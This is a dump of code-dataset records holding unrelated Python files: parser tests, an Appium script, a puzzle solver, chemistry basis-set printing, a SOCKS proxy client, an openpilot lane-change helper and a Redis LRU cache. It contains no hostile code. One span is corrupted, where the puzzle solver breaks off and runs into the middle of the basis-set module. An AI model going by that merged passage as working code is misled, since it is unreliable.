\"\"\"\n with self.lock:\n if key not in self:\n if len(self) == self.max_len:\n try:\n first = next(iter(self))\n if first in self:\n self.pop(first)\n finally:\n self.redis_conn.remove(first)\n else:\n if len(self) == self.max_len:\n OrderedDict.pop(self, key)\n self.redis_conn.remove(key)\n OrderedDict.__setitem__(self, key, (value, cur_time))\n self.redis_conn.set(key, value, cur_time)\n\n def set_capacity(self, n: int) -> None:\n \"\"\" reset the capacity of the LRU\"\"\"\n self.max_len = n\n while len(self) > self.max_len:\n deleted = self.popitem(last=False)\n del self[deleted]\n self.redis_conn.remove(deleted)\n\n def get_items_from_cache(self):\n \"\"\"get the former cache from database\"\"\"\n OrderedDict.clear(self)\n for key, value in self.redis_conn.get_all_keys().items():\n if not key.endswith('_time?'):\n self.__setitem__(key, value, float(self.redis_conn.get(key + '_time?')))\n\n def set_redis_conn(self, redis, cache_name):\n \"\"\"reset the redis connection\"\"\"\n self.redis_conn = RedisCache(cache_name=cache_name)\n self.redis_conn.set_redis_conn(redis)\n self.get_items_from_cache()\n\n def get(self, key, default=None):\n try:\n cur_time = time.time()\n value = self.__getitem__(key)\n del self[key]\n OrderedDict.__setitem__(self, key, (value, cur_time))\n self.redis_conn.set(key, value, cur_time)\n return value\n except KeyError:\n return default\n\n def put(self, key, value):\n self.__setitem__(key, value)\n\n def clear(self):\n OrderedDict.clear(self)\n self.redis_conn.clear()","sub_path":"Q3/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"256916554","text":"# -:- encoding: UTF-8 -:-\nimport locale\n\ndef sort_features(features, group_property='type', sort_properties=('name',), groups=None):\n \"\"\"\n Sort list of features (with properties) by a single group property and multiple sort properties.\n Features are sorted by the group first, then the additional properties. Sorts features\n alphanumerical, except for group properties which are sorted by the order of the groups list.\n\n Sorts features in-place.\n\n :param groups: List of group values. Defines the sort order of the group property.\n\n >>> fc = [\n ... {'properties': {'type': 'a', 'name': 'aaa'}},\n ... {'properties': {'type': 'b', 'name': 'aaa'}},\n ... {'properties': {'type': 'c', 'name': 'bbb'}},\n ... {'properties': {'type': 'c', 'name': 'aaa'}},\n ... 
]\n >>> sort_features(fc, groups=['c', 'a', 'b'])\n >>> fc # doctest: +NORMALIZE_WHITESPACE\n [{'properties': {'type': 'c', 'name': 'aaa'}},\n {'properties': {'type': 'c', 'name': 'bbb'}},\n {'properties': {'type': 'a', 'name': 'aaa'}},\n {'properties': {'type': 'b', 'name': 'aaa'}}]\n \"\"\"\n group_index = None\n if groups:\n group_index = {g: i for (i, g) in enumerate(groups)}\n\n def key(feature):\n k = []\n group = feature['properties'].get(group_property)\n if group_index:\n k.append(group_index.get(group, 1e99))\n else:\n k.append(group)\n\n locale_encoding = locale.getlocale(locale.LC_COLLATE)[1] or 'UTF-8'\n for p in sort_properties:\n v = feature['properties'].get(p)\n if v and isinstance(v, basestring):\n # get localized sort order by calling strxfrm\n # strxfrm expects encoded strings\n # split at whitespace as strxfrm can ignore it (depending on the collate)\n v = v.lower()\n v = v.replace(u'ä', 'ae')\n v = v.replace(u'ö', 'oe')\n v = v.replace(u'ü', 'ue')\n v = v.replace(u'ß', 'ss')\n v = tuple(locale.strxfrm(p) for p in\n v.encode(locale_encoding, errors='replace').split(' '))\n k.append(v)\n\n return tuple(k)\n\n features.sort(key=key)\n","sub_path":"munimap/query/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"115910190","text":"__version__G__ = \"(G)bd249ce4\"\n\nfrom ..logger.logger import logstring,verbose,verbose_flag\nfrom re import compile, findall,I\nfrom tld import get_fld,get_tld\nfrom tld.utils import update_tld_names\nfrom nltk import edit_distance\nfrom requests import get\nfrom io import BytesIO\nfrom zipfile import ZipFile\nfrom shutil import copyfileobj\nfrom os import path\nfrom itertools import islice\nfrom csv import reader\n\n#need refactoring\n\nclass URLSimilarity:\n @verbose(True,verbose_flag,\"Starting URLSimilarity\")\n def __init__(self):\n '''\n initialize class and get top 1m.csv from umbrella\n '''\n self.refs = path.abspath(path.join(path.dirname( __file__ ),\"..\", 'refs'))\n if not self.refs.endswith(path.sep): self.refs = self.refs+path.sep\n #if not path.isdir(self.refs): mkdir(self.refs)\n self.top = \"http://s3-us-west-1.amazonaws.com/umbrella-static/top-1m.csv.zip\"\n self.topsliced = None\n self.topdomains = None\n self.setup(self.refs)\n #update_tld_names()\n\n @verbose(True,verbose_flag,None)\n def setup(self,_path):\n '''\n check if top-1m.csv exists or not, if not then download load\n it and unzip it and take the top 10000 only\n '''\n if not path.exists(_path+'top-1m.csv'):\n zip_file = ZipFile(BytesIO(get(self.top).content))\n with zip_file.open('top-1m.csv') as zf, open(_path+'top-1m.csv', 'wb') as f:\n copyfileobj(zf, f)\n with open(_path+'top-1m.csv', 'r') as f:\n self.topsliced = islice(reader(f), 10000)\n self.topdomains = [x[1] for x in self.topsliced]\n\n @verbose(True,verbose_flag,None)\n def geturls(self,data):\n '''\n check if root domain exists in the top 10000 or not\n if yes appened it to list \n '''\n roots = []\n _x = list(set(findall(compile(r\"((http:\\/\\/www\\.|https:\\/\\/www\\.|http:\\/\\/|https:\\/\\/)[a-zA-Z0-9\\-\\.]+\\.[a-zA-Z]{2,3}(:[a-zA-Z0-9]*)?\\/?([a-zA-Z0-9_\\,\\'/\\+&%#\\$\\?\\=~\\.\\-])*)\",I),self.wordsstripped)))\n for _ in _x:\n if get_tld(_[0], fail_silently=True):\n root = None\n try:\n root = get_fld(_[0],fix_protocol=True)\n except:\n pass\n if root:\n roots.append(root)\n if roots:\n for domain in self.topdomains:\n dist = edit_distance(domain,root)\n if 
dist <= 2:\n data.append({\"Distance\":dist,\"URL\":root,\"Similar\":domain})\n\n\n @verbose(True,verbose_flag,\"Analyzing URLs\")\n def checkwithurls(self,data):\n '''\n start finding urls in top 10000 list \n '''\n self.words = data[\"StringsRAW\"][\"wordsinsensitive\"]\n self.wordsstripped = data[\"StringsRAW\"][\"wordsstripped\"]\n data[\"URLs\"] = {\"URLs\":[],\n \"_URLs\":[\"Distance\",\"URL\",\"Similar\"]}\n self.geturls(data[\"URLs\"][\"URLs\"])","sub_path":"qbanalyzer/modules/urlsimilarity.py","file_name":"urlsimilarity.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"24171383","text":"from bs4 import BeautifulSoup\n\nfrom scraping.getDataStatTable import getDataStatTable\nfrom scraping.URLCache import URLCache\nfrom scraping.kdbWriter import qConnection\n\n\ndef getSeason(url, odds_url, current_TF=False, useCache=True):\n # tested on\n # url = 'https://fbref.com/en/comps/9/1526/2016-2017-Premier-League-Stats'\n\n season_code = url.split('/')[6]\n\n html_files = URLCache()\n\n league_id, season_id, league_name = url.split('/')[5:]\n season_year = league_name.split('-')[0]\n league_name = '_'.join(league_name.split('-')[2:][:-1])\n\n response = html_files.getURL(url, useCache)\n soup = BeautifulSoup(response, 'html.parser')\n\n main_table = soup.find(\"table\", id='results' + season_code + '1_overall')\n\n res_table = getDataStatTable(main_table)\n\n res_table = res_table.assign(league_name=league_name) \\\n .assign(league_id=league_id) \\\n .assign(season_year=season_year) \\\n .assign(season_id=season_id) \\\n .assign(current_TF=current_TF) \\\n .assign(source=url) \\\n .assign(odds_source=odds_url)\n\n res_table['team_code'] = res_table['squad_link'].str.split('/').str[3]\n\n res_table.rename(columns={\"squad\": \"team\", \"squad_link\": \"team_link\"}, inplace=True)\n\n output = res_table[['source', 'odds_source', 'league_name', 'league_id',\n 'season_year', 'season_id', 'team',\n 'team_code', 'team_link', 'current_TF',\n 'games', 'wins', 'draws', 'losses']]\n\n convert_dict = {'source': str,\n 'odds_source': str,\n 'league_name': str,\n 'league_id': int,\n 'season_year': int,\n 'season_id': int,\n 'team': str,\n 'team_code': str,\n 'team_link': str,\n 'current_TF': bool,\n 'games': int,\n 'wins': int,\n 'draws': int,\n 'losses': int\n }\n\n kdb = qConnection()\n kdb.write(output.astype(convert_dict), 'Season')\n","sub_path":"96/scraping/getSeason.py","file_name":"getSeason.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"157840932","text":"#!/bin/env python3.6\n# -*- coding: utf-8 -*-\n\n__author__ = \"Oleg Evdokimov\"\n__disclaimer__ = \"\"\"\n\nЗависимости:\n clickhouse-driver==0.1.5\n jira==2.0.0\n loguru==0.5.3\n mailru-im-bot==0.0.14\n PyYAML==5.3.1\n schedule==0.6.0\n\nManuals: \n https://myteam.mail.ru/botapi/\n\"\"\"\n\nimport os\nimport sys\nfrom typing import Dict\nfrom functools import wraps\n\nimport schedule\nimport re\nimport yaml\nimport hashlib\nimport socket\nimport sqlite3\nimport requests\nimport json\n\nfrom loguru import logger\nfrom time import sleep\nfrom datetime import datetime, timedelta\nfrom bot.bot import Bot\nfrom bot.event import Event, EventType\nfrom bot.handler import MessageHandler, CommandHandler, BotButtonCommandHandler, UnknownCommandHandler\nfrom requests.exceptions import ReadTimeout, ConnectTimeout, ConnectionError\nfrom clickhouse_driver 
import Client\nfrom collections import deque\nfrom jira import JIRA\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom ipaddress import IPv4Address, IPv4Network, AddressValueError\n\nCONFIG_FILE = '/configs/secure_bot.yaml'\n\n\n# очередь для отпарсенных логов secure и tacacs (очередь событий)\nLogEventsQueue = deque()\n# очередь для аггрегированных логов tacacs (очередь событий)\nTacEventsQueue = deque()\n# очередь для аггрегированных логов secure (очередь событий)\nSecureEventsQueue = deque()\n# очередь для проверки source ip (очередь событий)\nSourceEventsQueue = deque()\n# очередь для событий, по которым юзеру отправлен запрос и ожидается ответ\nRequestEventsQueue = deque()\n# очередь для событий, по которым требуется создать jira-инц\nAlarmEventsQueue = deque()\n\n\n@dataclass\nclass DBQuery:\n table: str\n keys: list\n sql_query: str\n\n\nclass User:\n def __init__(self, usertype, login, chat_id):\n self._usertype = usertype\n self._login = login\n self._chat_id = chat_id\n\n @property\n def usertype(self):\n return self._usertype\n\n @property\n def login(self):\n return self._login\n\n @property\n def chat_id(self):\n return self._chat_id\n\n def __repr__(self):\n return f'{self._usertype} : {self._login} : {self._chat_id}'\n\n\nclass UserList:\n def __init__(self, usertype=None, user_dict=None):\n self.usertype_flag = None\n self.users = []\n if isinstance(user_dict, dict) and usertype:\n for uname, chat_id in user_dict.items():\n user = User(usertype, uname, chat_id)\n self.users.append(user)\n\n def __add__(self, new_user):\n if isinstance(new_user, User):\n self.users.append(new_user)\n return self\n\n def __setitem__(self, old_user: User, new_login: str):\n self.users.remove(old_user)\n old_user._login = new_login\n self.users.append(old_user)\n\n def __iter__(self):\n for u in self.users:\n yield u\n\n def __len__(self):\n return len(self.users)\n\n def __repr__(self):\n res = ''\n for u in self.users:\n res += '{}\\n'.format(''.join(u.__repr__()))\n return res\n\n def __format__(self, usertype):\n res = ''\n for u in self.users:\n if u.usertype == usertype:\n res += '{}\\n'.format(''.join(u.__repr__()))\n return res\n\n def __getattribute__(self, item):\n if item in (NETWORK, SERVER):\n self.usertype_flag = item\n return self\n elif item in ('logins',):\n res = []\n for u in self.users:\n if u.usertype == self.usertype_flag:\n res.append(u.login)\n return res\n return super().__getattribute__(item)\n\n def get_users(self, usertype=None, login=None, chat_id=None):\n user_list = []\n for u in self.users:\n if u.usertype == usertype or u.login == login or u.chat_id == chat_id:\n user_list.append(u)\n return user_list\n\n def get_user(self, usertype, login=None, chat_id=None):\n for u in self.users:\n if u.usertype == usertype and (u.login == login or u.chat_id == chat_id):\n return u\n # if user not found\n return User(usertype, UNKNOWN_USER, USER_ADMIN_CHAT_ID)\n\n def update_db(self, usertype=None, user_dict=None):\n if isinstance(user_dict, dict) and usertype:\n for uname, chat_id in user_dict.items():\n user = User(usertype, uname, chat_id)\n self.users.append(user)\n\n\n# класс для описания События (событие - запись из лог файла подпадающая под условие)\nclass EventLogClass:\n def __init__(self, log_date, alarm_type, username, login, host, src_ip, text, descr=''):\n self.date = log_date\n self.alarm_type = alarm_type\n self.username = username\n self.login = login\n self.host = host\n self.src_ip = src_ip\n self.text = text\n self.descr = descr\n 
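# dialogue-state flags (descriptive comment, not in the original source): set_request(), set_reply(), set_alarm() and set_hash() below update these as the bot queries the user and handles the answer\n        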
self.request = False\n self.request_time = None\n self.second_request = False\n self.reply = False\n self.alarm = False\n self.hash = None\n\n def set_request(self, request_time):\n self.request = True\n self.request_time = request_time\n\n def set_reply(self):\n self.reply = True\n\n def set_alarm(self, flag):\n self.alarm = flag\n\n def set_hash(self, msg_text):\n self.hash = self.get_hash(msg_text)\n\n\n @staticmethod\n def get_hash(text):\n digest = hashlib.new('md5')\n digest.update(text.encode())\n return digest.hexdigest()\n\n def show(self):\n return ('hash_id: {} \\n date: {} - type: {} - user: {} - login: {} - host: {} - src: {} - text: {}'.\n format(self.hash,\n self.date,\n self.alarm_type,\n self.username,\n self.login,\n self.host,\n self.src_ip,\n self.text))\n\n\n\ntry:\n secure_bot = Bot(token=TOKEN, api_url_base=MYTEAM_URL)\nexcept Exception as error:\n logger.error(f'\\nCannot connect to the Bot API: {error.with_traceback(sys.exc_info()[2])}')\n os._exit(-1)\n\n\n\ndef buttons_answer_cb(bot, event):\n if event.data['callbackData'] == \"call_back_yes\":\n data = {\n 'from': {'firstName': event.data['from']['firstName'],\n 'lastName': event.data['from']['lastName'],\n 'userId': event.data['from']['userId']},\n 'chat': {'chatId': event.data['message']['chat']['chatId'],\n 'type': event.data['message']['chat']['type']},\n 'msgId': event.data['message']['msgId'],\n 'text': 'Yes',\n 'timestamp': event.data['message']['timestamp']\n }\n yes_msg = Event(EventType.NEW_MESSAGE, data)\n msg_text = event.data['message']['text']\n hash_log = EventLogClass.get_hash(msg_text)\n reply_bot(bot, yes_msg, hash_log)\n\n elif event.data['callbackData'] == \"call_back_no\":\n data = {\n 'from': {'firstName': event.data['from']['firstName'],\n 'lastName': event.data['from']['lastName'],\n 'userId': event.data['from']['userId']},\n 'chat': {'chatId': event.data['message']['chat']['chatId'],\n 'type': event.data['message']['chat']['type']},\n 'msgId': event.data['message']['msgId'],\n 'text': 'No',\n 'timestamp': event.data['message']['timestamp']\n }\n no_msg = Event(EventType.NEW_MESSAGE, data)\n msg_text = event.data['message']['text']\n hash_log = EventLogClass.get_hash(msg_text)\n reply_bot(bot, no_msg, hash_log)\n\n\ndef send_msg(chat_id, message, with_buttons=False):\n try:\n if not with_buttons:\n mt_response = secure_bot.send_text(chat_id=chat_id, text=message)\n logger.info(f'Myteam answer: {mt_response}')\n else:\n mt_response = secure_bot.send_text(\n chat_id=chat_id,\n text=message,\n inline_keyboard_markup=\"{}\".format(json.dumps([[\n {\"text\": \"ДА\", \"callbackData\": \"call_back_yes\", \"style\": \"primary\"},\n {\"text\": \"НЕТ\", \"callbackData\": \"call_back_no\", \"style\": \"attention\"}]])))\n if not mt_response.json()['ok']:\n text_to_chat = 'ERROR: check_alarm_queue(). 
Myteam message delivery error \\n ' \\\n 'response: {} \\n ' \\\n 'message: {} \\n ' \\\n 'user: {}'.format(mt_response.json(), message, chat_id)\n # myteam delivery\n secure_bot.send_text(chat_id=USER_ADMIN_CHAT_ID, text=text_to_chat)\n # telegram delivery\n data = {'chat_id': TG_MAJOR, 'text': text_to_chat}\n tg_response = requests.post(TG_URL + TG_TOKEN + '/sendMessage', data=data, proxies=TG_PROXIES)\n logger.info(f'Send_alarm_message: {tg_response.json()}, chat_id: {chat_id}')\n logger.info(f'Send_message: {message}, user: {chat_id}')\n except Exception as e:\n text_debug = f'{send_msg.__name__}\\nMessage: {message}\\nError: {e}'\n logger.error(text_debug)\n\n\n# get DATA from DB\ndef get_cmdb():\n request = CMDB_API_URL + 'NetworkHostListWithIP'\n try:\n json_response = requests.get(request, auth=(CMDB_API_USER, CMDB_API_PASS), timeout=(3, 5)).text\n cmdb_dict = json.loads(json_response)\n except (ReadTimeout, ConnectTimeout, ConnectionError, json.decoder.JSONDecodeError) as e:\n text = f'{get_cmdb.__name__}. CMDB connection error. {e}'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n if cmdb_dict:\n return cmdb_dict\n else:\n text = f'{get_cmdb.__name__}. Cannot fetch data from CMDB.'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n\n\ndef clear_cmdb_table():\n db_table = 'NetworkHostListWithIP'\n query_drop = 'DROP TABLE IF EXISTS {}'.format(db_table)\n query_vacuum = 'VACUUM'\n query_create = \"\"\"\n CREATE TABLE IF NOT EXISTS {} (\n HostName text NOT NULL,\n HostState text NOT NULL,\n IP text,\n HardwareModel_Name text,\n NetworkRoles text,\n OrgUnitName text);\n \"\"\".format(db_table)\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n cursor.execute(query_drop)\n cursor.execute(query_create)\n cursor.execute(query_vacuum)\n conn.commit()\n cursor.close()\n conn.close()\n return True\n except sqlite3.Error as e:\n text = f'ERROR: {clear_cmdb_table.__name__}. 
{e}'\n send_msg(USER_ADMIN_CHAT_ID, text)\n logger.error(e)\n return False\n\n\ndef clone_cmdb_to_local():\n logger.info(f'{clone_cmdb_to_local.__name__}')\n db_table = 'NetworkHostListWithIP'\n cmdb_dict = get_cmdb()\n if cmdb_dict is False:\n return False\n cmdb_list = list()\n for cd in cmdb_dict:\n cmdb_tuple = (\n cd['HostName'], cd['HostState'], cd['IP'], cd['HardwareModel_Name'], cd['NetworkRoles'], cd['OrgUnitName'])\n cmdb_list.append(cmdb_tuple)\n clear_cmdb_table()\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n query = 'INSERT INTO {} ({}, {}, {}, {}, {}, {}) VALUES (?, ?, ?, ?, ?, ?)' \\\n .format(db_table, 'HostName', 'HostState', 'IP', 'HardwareModel_Name', 'NetworkRoles', 'OrgUnitName')\n cursor.executemany(query, cmdb_list)\n conn.commit()\n cursor.close()\n conn.close()\n return True\n except sqlite3.Error as e:\n text = f'SQLite error in clone_cmdb_to_local(): {e}'\n send_msg(USER_ADMIN_CHAT_ID, text)\n logger.error(text)\n return False\n\n\ndef read_db(query):\n global NetworkHostListDB\n query_request = f'{query.sql_query} {query.table}'\n keys = query.keys\n fetch_db_list = []\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n cursor.execute(query_request)\n for row in cursor:\n i = 0\n item_db_dict = {}\n for key in keys:\n item_db_dict[key] = row[i]\n i += 1\n fetch_db_list.append(item_db_dict)\n conn.commit()\n cursor.close()\n conn.close()\n except Exception as e:\n logger.error(f'{e.with_traceback(sys.exc_info()[2])}')\n return False\n NetworkHostListDB = fetch_db_list\n return True\n\n\ndef get_host_db(key, value, outbound_key):\n for item in NetworkHostListDB:\n if item.get(key) == value:\n return item[outbound_key]\n return value\n\n\ndef is_valid_src_ip(src, valid_sources):\n for valid_src in valid_sources:\n try:\n if src == valid_src or IPv4Address(src) in IPv4Network(valid_src):\n return True\n except AddressValueError:\n logger.error(f'AddressValueError in {is_valid_src_ip.__name__}')\n return False\n\n\ndef parse_username(usertype, user_login):\n logins: list = []\n if usertype == SERVER:\n logins = USERS.server.logins\n elif usertype == NETWORK:\n logins = USERS.network.logins\n pattern = re.compile('|'.join(logins))\n suspicious_user = pattern.search(user_login)\n if not suspicious_user:\n return str('')\n return suspicious_user.group()\n\n\n# парсим логи из базы за время PARSE_TIME с задержкой DELAY_TIME от текущего времени\ndef parse_log(db_client, log_template_alarm_list, log_template_info_list, alarm_types):\n global DATE_PARSE_BEGIN, BOT_ALIVE\n current_date = datetime.now()\n date2 = current_date - timedelta(seconds=DELAY_TIME)\n date1 = DATE_PARSE_BEGIN + timedelta(seconds=1)\n DATE_PARSE_BEGIN = date2\n date1_sql = date1.strftime(\"%Y-%m-%d %H:%M:%S\")\n date2_sql = date2.strftime(\"%Y-%m-%d %H:%M:%S\")\n query = \"\"\"\n WITH\n toDateTime('{}') as date_1,\n toDateTime('{}') as date_2 \n SELECT * from distributed_logs PREWHERE Alarm_type IN ('{}','{}') AND Timestamp >= date_1 AND Timestamp <= date_2 ORDER BY Timestamp\n \"\"\".format(date1_sql, date2_sql, *alarm_types)\n\n log_data = []\n logger.debug(f'QUERY: {query}')\n t1 = datetime.now()\n try:\n log_data = db_client.execute(query)\n except Exception as e:\n text = f'ERROR: clickhouse connection failed: {e}'\n logger.error(e)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n except KeyboardInterrupt:\n logger.info('\\nterminate script process by Ctrl-C\\n')\n os._exit(1)\n\n template_alarm = re.compile(('|'.join(log_template_alarm_list)))\n 
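# note (descriptive comment, not in the original source): each template list is collapsed into a single alternation regex, so every fetched log row is scanned once per category (alarm vs. info)\n    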
template_info = re.compile(('|'.join(log_template_info_list)))\n logger.debug(f'Logs Count: {len(log_data)}')\n for item in log_data:\n event_text = item[5]\n if template_alarm.search(event_text):\n parse_event(item)\n if template_info.search(event_text):\n parse_event(item, success_login=True)\n\n t2 = datetime.now()\n logger.debug(f'SQL Query Time: {str((t2 - t1).total_seconds())}')\n logger.debug(f'{parse_log.__name__}')\n BOT_ALIVE = True\n return True\n\n\ndef parse_event(item, success_login=False):\n logger.debug(f'LOG EVENT: {str(item)}')\n\n event_login = UNKNOWN_USER\n event_src_ip = '0.0.0.0'\n log_template = str()\n event_create_time = item[1]\n event_host = item[2]\n alarm_type = item[4]\n event_text = item[5]\n\n for item in LOG_SERVER_TEMPLATES:\n if item in event_text:\n event_text = event_text[event_text.find(item):]\n\n if alarm_type == ALARM_TYPES[SERVER]:\n secure_log_entry_re = re.compile(r\"(?P(?:(\\D+)|\\D+\\S+))\\s+\"\n r\"for\\s+\"\n r\"(?P(?:((?:illegal|invalid)\\ user\\s+)|))\"\n r\"(?P(?:(\\S+)|))(?:(\\s+)|)\"\n r\"from\\s+\"\n r\"(?P(?:(\\S+)))\\s*\", re.VERBOSE)\n\n log_match = secure_log_entry_re.match(event_text)\n\n if log_match:\n event_login = log_match.groupdict()['user']\n event_src_ip = log_match.groupdict()['src_ip']\n log_template = log_match.groupdict()['log_template']\n else:\n text = f'ERROR: Cannot parse log message: {event_text}'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n\n user: User = USERS.get_user(usertype=SERVER, login=event_login)\n\n # don't send msg, don't create inc\n if user.chat_id == NOT_SEND:\n return True\n\n # send msg to chat only, don't create inc (if LOGIN_SUCCESS)\n if success_login:\n # success login to server for unknown user\n if user.login == UNKNOWN_USER:\n msg = MSG_ADMIN_UNKNOWN_LOGIN_SUCCESS\n # success login to server for valid user\n else:\n msg = MSG_USER_LOGIN_SUCCESS\n\n text = f\"{event_host} - {msg}\\n\\n\" \\\n f\"Date/Time: {event_create_time.strftime('%d %B - %H:%M:%S')}\\n\" \\\n f\"Source IP: {event_src_ip}\\n\\n\" \\\n f\"Log: {event_text}\"\n send_msg(USER_ADMIN_CHAT_ID, text)\n return True\n\n # find similar username\n event_user = parse_username(usertype=SERVER, user_login=event_login)\n # user is unknown ?\n if len(event_user) == 0:\n event_user = UNKNOWN_USER\n\n log_event = EventLogClass(event_create_time, alarm_type, event_user, event_login, event_host, event_src_ip, event_text)\n logger.debug(f'{parse_event.__name__} {log_event.show()}')\n\n if CHECK_SERVER_SOURCE_IP_TEMPLATE.lower() in log_template.lower():\n SourceEventsQueue.append(log_event)\n elif CHECK_SERVER_FAILED_LOGIN.lower() in log_template.lower():\n SecureEventsQueue.append(log_event)\n\n ######\n elif alarm_type == ALARM_TYPES[NETWORK]:\n device_ip = event_text.split(' ')[1]\n try:\n event_hostname = socket.gethostbyaddr(device_ip)[0]\n if event_hostname == device_ip:\n event_hostname = get_host_db('IP', device_ip, 'HostName')\n except socket.herror:\n event_hostname = get_host_db('IP', device_ip, 'HostName')\n\n tac_log_entry_re = re.compile(r\"tac_plus\\[\\d+]:\\s+(?P\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s*\"\n r\"(?P(?:(\\S+)|))(?:(\\s+)|)\"\n r\"(?P(?:(\\S+)|))(?:(\\s+)|)\"\n r\"(?P(?:(\\s+\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}))|(\\s+\\S+))\\s+\"\n r\"(?:shell|pap)\\s+login\\s+failed\", re.VERBOSE)\n\n log_match = tac_log_entry_re.match(event_text)\n\n if log_match:\n event_login = log_match.groupdict()['user'].strip(' ')\n event_src_ip = log_match.groupdict()['src_ip'].strip(' ')\n else:\n text = 'ERROR: 
Cannot parse log message: ' + event_text\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n user: User = USERS.get_user(usertype=NETWORK, login=event_login)\n\n # don't send msg, don't create inc\n if user.chat_id == NOT_SEND:\n return True\n\n # find similar username\n event_user = parse_username(usertype=NETWORK, user_login=event_login)\n\n # user is unknown ?\n if len(event_user) == 0:\n event_user = UNKNOWN_USER\n\n log_event = EventLogClass(event_create_time, alarm_type, event_user, event_login, event_hostname, event_src_ip,\n event_text)\n\n # if well-known source - don't create Event\n if not is_valid_src_ip(event_src_ip, LIGITIMATE_EXCEPT_SRC):\n SourceEventsQueue.append(log_event)\n\n logger.debug(f'{parse_event.__name__}. LEN Source Events: {len(SourceEventsQueue)}')\n logger.debug(f'{parse_event.__name__}. TAC Event: {log_event.show()}')\n else:\n return False\n logger.debug('', parse_event.__name__)\n return True\n\n\n# проверяем ивенты в SOURCE очереди и генерим алармы при не валидном src_ip\ndef source_queue_checker():\n logger.debug(f'{source_queue_checker.__name__}')\n logger.debug(f'LEN SourceEventsQueue: {len(SourceEventsQueue)}')\n\n while SourceEventsQueue:\n log_event = SourceEventsQueue.popleft()\n logger.debug(f'{source_queue_checker.__name__}. Username: {log_event.username}')\n\n if not is_valid_src_ip(log_event.src_ip, SRC_VALID_NETS):\n log_event.descr = MSG_ADMIN_UNKNOWN_SOURCE\n AlarmEventsQueue.append(log_event)\n logger.debug(f'{source_queue_checker.__name__}. LEN ALARM Events: {len(AlarmEventsQueue)}')\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nLogin: {}\\n{}'.format(MSG_ADMIN_UNKNOWN_SOURCE, log_event.src_ip,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.login, log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n\n logger.debug(f'{source_queue_checker.__name__}. Log Event: {log_event.show()}')\n elif log_event.alarm_type == ALARM_TYPES[NETWORK]:\n TacEventsQueue.append(log_event)\n logger.debug(f'{source_queue_checker.__name__}. LEN TAC Events: {len(TacEventsQueue)}')\n\n\n# проверяем ивенты в SECURE очереди и генерим алармы при превышении пороговых условий\ndef secure_queue_checker():\n logger.debug(f'{secure_queue_checker.__name__}. LEN SecureEventsQueue: {len(SecureEventsQueue)}')\n login_failed_user_count = {}\n is_user_alarm = dict()\n\n while SecureEventsQueue:\n log_event = SecureEventsQueue.popleft()\n user_device = (log_event.username, log_event.host)\n logger.debug(f'{secure_queue_checker.__name__}. Username_Device: {user_device}')\n\n if not is_user_alarm.get(user_device, False):\n if log_event.username not in login_failed_user_count.keys():\n logger.debug(f'{secure_queue_checker.__name__}. Server Failed Users = 1')\n login_failed_user_count[user_device] = 1\n else:\n u = login_failed_user_count[user_device] + 1\n login_failed_user_count[user_device] = u\n logger.debug(f'{secure_queue_checker.__name__}. 
Server Failed Users = {u}')\n\n count_user = login_failed_user_count[user_device]\n\n if log_event.username == UNKNOWN_USER:\n max_attempts = MAX_UNKNOWN_USER_ATTEMPTS_SRV\n else:\n max_attempts = MAX_USER_ATTEMPTS_SRV\n\n if count_user >= max_attempts:\n alarm_text = '{}: \"{}\"'.format(MSG_ADMIN_LOGIN_FAILED, log_event.login)\n log_event.descr = alarm_text\n suspicious_user: User = USERS.get_user(usertype=ALARM_TYPES[log_event.alarm_type], login=log_event.login)\n\n if suspicious_user.login == UNKNOWN_USER:\n log_event.descr = MSG_ADMIN_UNKNOWN_USER\n AlarmEventsQueue.append(log_event)\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_ADMIN_UNKNOWN_USER,\n log_event.login,\n log_event.date.strftime(\n '%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n else:\n LogEventsQueue.append(log_event)\n is_user_alarm[user_device] = True\n logger.debug(f'{secure_queue_checker.__name__} Log Event: {log_event.show()}')\n\n\n# проверяем ивенты в TAC очереди и генерим алармы при превышении пороговых условий\ndef tac_queue_checker():\n login_failed_user_count = {}\n is_user_alarm = dict()\n logger.debug(f'{tac_queue_checker.__name__}. LEN TacEventsQueue: {len(TacEventsQueue)}')\n\n while TacEventsQueue:\n log_event = TacEventsQueue.popleft()\n user_device = (log_event.username, log_event.host)\n logger.debug(f'{tac_queue_checker.__name__}. Username: {log_event.username}')\n\n if not is_user_alarm.get(user_device, False):\n if log_event.username not in login_failed_user_count.keys():\n logger.debug(f'{tac_queue_checker.__name__}. Tacacs Failed Users = 1')\n login_failed_user_count[user_device] = 1\n else:\n u = login_failed_user_count[user_device] + 1\n login_failed_user_count[user_device] = u\n logger.debug(f'{tac_queue_checker.__name__}. Tacacs Failed Users = {u}')\n\n count_user = login_failed_user_count[user_device]\n\n if log_event.username == UNKNOWN_USER:\n max_attempts = 